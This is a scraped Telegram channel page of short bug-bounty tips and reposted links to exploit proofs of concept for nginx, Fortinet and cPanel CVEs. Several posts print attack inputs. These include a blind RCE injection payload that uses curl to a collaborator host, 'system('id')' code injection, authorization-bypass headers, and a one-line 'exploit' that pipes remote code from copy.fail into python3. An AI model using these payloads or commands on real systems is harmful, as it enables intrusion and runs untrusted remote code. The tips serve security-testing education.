fa
Feedback
Brut Security 2.0

Brut Security 2.0

رفتن به کانال در Telegram

Bringing you Bug Bounty Video POCs from top hunters around the globe!

نمایش بیشتر
4 514
مشترکین
-224 ساعت
+137 روز
-130 روز
آرشیو پست ها
Repost from Brut Security
👉👉👉👉Please don’t forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the ⭐️ to show your support. Thanks!😋😋😋

Repost from Brut Security
😈Turn your Burp Suite findings into clean, professional cards, ready for reports, bug bounty submissions, and social sharing
😈Turn your Burp Suite findings into clean, professional cards, ready for reports, bug bounty submissions, and social sharing. 🚨https://github.com/JFOZ1010/repshot

Hye Hunter's, DarkShadow is here back again! Blind RCE in load model💀 if you see any endpoint which load model/function from
+2
Hye Hunter's, DarkShadow is here back again! Blind RCE in load model💀 if you see any endpoint which load model/function from client side try:
1) you can find ../../ FLI easily 2) system('id'); php functions for code injection 3) \"exec\" try blind rce using your burpcollab
guy's you can join my new youtube channel i'll upload here reguler videos youtube.com/@darkshadow2bd #rce # bugbounty # bugbountytips

photo content
+2

Hey Hunter's, DarkShadow is here back again! Just now, I’ve dropped a new tool on GitHub that can hide anything inside nothin
Hey Hunter's, DarkShadow is here back again! Just now, I’ve dropped a new tool on GitHub that can hide anything inside nothing! This is called Project-Invisible. Here’s the GitHub link: https://github.com/darkshadow2bd/Project-Invisible And don’t miss the full video on my YouTube channel: https://youtu.be/t4yTY0Cg6Ds?si=ZG99_pev06yZFHGi If you’re interested, you can join my YouTube channel. I’ll upload my methods regulerly in YouTube videos if you guys join here. #tools #bugbountytips

Hey Hunter's, DarkShadow is here back again! ?url= ❌SSRF, ✅RCE If you find a parameter that passes through the URL, before te
+1
Hey Hunter's, DarkShadow is here back again! ?url= ❌SSRF, ✅RCE If you find a parameter that passes through the URL, before testing for SSRF, try testing for RCE.
1. bypass: ?url=http://x"; [now add here your blind rce payload] 2. payload: curl${IFS}burp-collab-link;#
Now, guys, if you genuinely enjoy reading such methods, show your appreciation. I’ll soon publish a very interesting tool! And Don't forget to follow me x.com/darkshadow2bd #rce #bugbounty #bugbountytips

Repost from Brut Security
🦊 GRAFANA FINAL SCANNER v2.0 😈https://github.com/Zierax/Grafana-Final-Scanner
🦊 GRAFANA FINAL SCANNER v2.0 😈https://github.com/Zierax/Grafana-Final-Scanner

Repost from Brut Security
⚠️CVE-2026-42945: RCE Proof of concept for CVE-2026-42945, a critical heap buffer overflow in NGINX's ngx_http_rewrite_module
⚠️CVE-2026-42945: RCE Proof of concept for CVE-2026-42945, a critical heap buffer overflow in NGINX's ngx_http_rewrite_module introduced in 2008 GitHub: https://github.com/depthfirstdisclosures/nginx-rift

Repost from Brut Security
A collection of AI agent prompts for bug bounty and pentesting workflows: https://github.com/matty69v/Bug-Bounty-Agents

Repost from Brut Security
🦊Sharing again 10 free access - https://topmate.io/saumadip/2009859?coupon_code=asas

Hey Hunter’s, DarkShadow is here back again! if you got any api endpoint and showing you unauthorized then use fake perameter
Hey Hunter’s, DarkShadow is here back again! if you got any api endpoint and showing you unauthorized then use fake perameter like:
/api/public = unauthorized /api/public/latest?anything=/api/public
you can FUZZ like: ?admin=true, ?bypass=1, debug=true, OR try to add header “X-Custom-IP-Authorization: 127.0.0.1 these are some underrated but very effective method which i use to check api endpoints. if you guy’s really enjoy to read such method then show your love to react here 🔥❤️

Repost from Brut Security
⚡️PoC collection of Atlassian(Jira, Confluence, Bitbucket) products and Jenkins, Solr, Nexus,etc ✅http://github.com/shadowsoc
⚡️PoC collection of Atlassian(Jira, Confluence, Bitbucket) products and Jenkins, Solr, Nexus,etc ✅http://github.com/shadowsock5/Poc

Repost from Brut Security
🔔 A PoC/exploit has been discovered for vulnerability CVE-2026-35616 PT ID: PT-2026-30288 Vendor: Fortinet Product: FortiClientEMS Description: A improper access control vulnerability in Fortinet FortiClientEMS 7.4.5 through 7.4.6 may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests. Link: https://github.com/Alaatk/CVE-2026-35616

Repost from Brut Security

🚨 cPanelSniper — CVE-2026-41940 cPanel & WHM'de CVSS 10.0 kritik auth bypass. CRLF injection → session file poisoning → root
🚨 cPanelSniper — CVE-2026-41940 cPanel & WHM'de CVSS 10.0 kritik auth bypass. CRLF injection → session file poisoning → root WHM access. https://github.com/ynsmroztas/cPanelSniper

Repost from Brut Security
🥺 If you found the posts helpful, drop a like on the post. It helps us reach more people and keeps us motivated to share better content.

Repost from Brut Security
🔥CVE-2026-41940 cPanel/WHM Authentication Bypass - Detection Artifact Generator 🚨https://github.com/watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

Repost from Brut Security
Behind every secure system, there’s someone putting in the work no one sees. Late nights, constant learning, silent defense.
Behind every secure system, there’s someone putting in the work no one sees. Late nights, constant learning, silent defense. This Labour Day, we salute every ethical hacker, analyst, and learner building a safer digital world. Respect the grind. Happy Labour Day. #LabourDay #CyberSecurity #EthicalHacking #BrutSecurity

Hey Hunter's, DarkShadow is here back again! 🚨History Breaking exploit😳 CVE-2026-31431 (nickname: copy fail) A Linux Privilege Escalation in all the major OS, hidden in the kernel for 9 years and discovered by an Ai !!! Exploit code:
curl copy.fail/exp | python3 && su
Guys, AI is going to be very dangerous😨 Don't forget to follow me x.com/darkshadow2bd #exploit #bugbountytips #linux